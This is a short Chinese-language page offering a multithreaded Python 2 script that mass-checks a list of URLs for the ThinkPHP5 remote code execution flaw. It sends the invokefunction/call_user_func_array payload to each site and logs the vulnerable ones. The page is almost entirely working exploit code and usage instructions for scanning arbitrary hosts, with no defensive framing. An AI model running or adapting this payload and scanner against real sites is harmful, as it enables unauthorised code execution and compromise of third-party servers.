Thinkphp5命令执行批量验证脚本
thinkphp5命令执行¶
POC检测代码¶
# -*- coding:UTF-8 -*-
# evn :python2
import requests
import threading
import time
import sys
class check(threading.Thread): #判断是否存在这个漏洞的执行函数
def __init__(self, url, sem):
super(check, self).__init__() #继承threading类的构造方法,python3的写法super().__init__()
self.url = url
self.sem = sem
def run(self):
parameters = "s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
try:
responce = requests.get(url = self.url, params = parameters,timeout=3)
body = responce.text
if body.find('PHP Extension') != -1:
with open("success.txt", "a+") as f1:
f1.write("存在tp5远程代码执行漏洞: " + self.url + "\n")
print("[+] " + self.url)
else:
print("[-] " + self.url)
except Exception,err:
print("connect failed")
pass
self.sem.release() #执行完函数,释放线程,线程数加1
class host(threading.Thread): #遍历文件操作
def __init__(self, sem):
super(host, self).__init__() #继承threading类的构造方法,python3的写法super().__init__()
self.sem = sem
def run(self):
with open("url.txt", "r") as f:
for host in f.readlines():
self.sem.acquire() #遍历一个就获得一个线程,直到达到最大
host = host.strip()+"/public/index.php"
host_thread = check(host, self.sem)
host_thread.start() #执行check()的执行函数
if __name__ == '__main__':
sem = threading.Semaphore(10) #最大线程数为10个
thread = host(sem) #传递sem值
thread.start()
使用方法:在当前页面下创建./url.txt(为需要检测的url),success.txt为含有漏洞的url。